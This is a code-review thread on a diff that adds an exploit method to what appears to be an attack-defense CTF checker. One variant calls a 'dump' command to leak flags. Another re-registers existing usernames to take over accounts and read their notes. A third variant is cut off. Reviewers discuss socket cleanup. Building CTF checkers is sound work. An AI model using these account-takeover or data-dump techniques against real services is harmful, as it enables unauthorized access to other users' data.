checker/src/checker.py

```diff
@@ -378,8 +379,52 @@ def exploit(self):
                 If nothing is returned, the service status is considered okay.
                 The preferred way to report Errors in the service is by raising an appropriate EnoException
         """
-        # TODO: We still haven't decided if we want to use this function or not. TBA
-        pass
+        if self.variant_id == 0:
+            conn = self.connect()
+            welcome = conn.read_until(">")
+            conn.write(b"dump\nexit\n")
+            data = conn.read_all()
+            if flag := self.search_flag_bytes(data):
+                return flag
+            raise BrokenServiceException("flag not found")
+        elif self.variant_id == 1:
+            conn = self.connect()
+            welcome = conn.read_until(">")
+            conn.write(b"user\n")
+            user_list = conn.read_until(b">").split(b"\n")[:-1]
+            for user in user_list:
+                user_name = user.split()[-1]
+                conn.write(b"reg %s foo\nlog %s foo\n list\n" % (user_name, user_name))
+                conn.read_until(b">")  # successfully registered
+                conn.read_until(b">")  # successfully logged in
+                notes_list = conn.read_until(b">").split(b"\n")[:-1]
+                for note in notes_list:
+                    note_id = note.split()[-1]
+                    conn.write(b"get %s\n" % note_id)
+                    data = conn.read_until(b">")
+                    if flag := self.search_flag_bytes(data):
+                        return flag
+            raise BrokenServiceException("flag not found")
+        elif self.variant_id == 2:
+            conn = self.connect()
```

Comment:
Does python tidy up connections nicely, even if we don't use `with` here?

Reply:
I don't think so, but since this is only the epxloit method, it should not really matter

Reply:
I think the bigger problem is that we never clean up connections when an exception is thrown

Reply:
Wouldn't `with` do exactly that?

Reply:
That depends, does the SimpleSocket base class implement the `__enter__` and `__exit__` methods? Or rather, does it inherit them from the base class?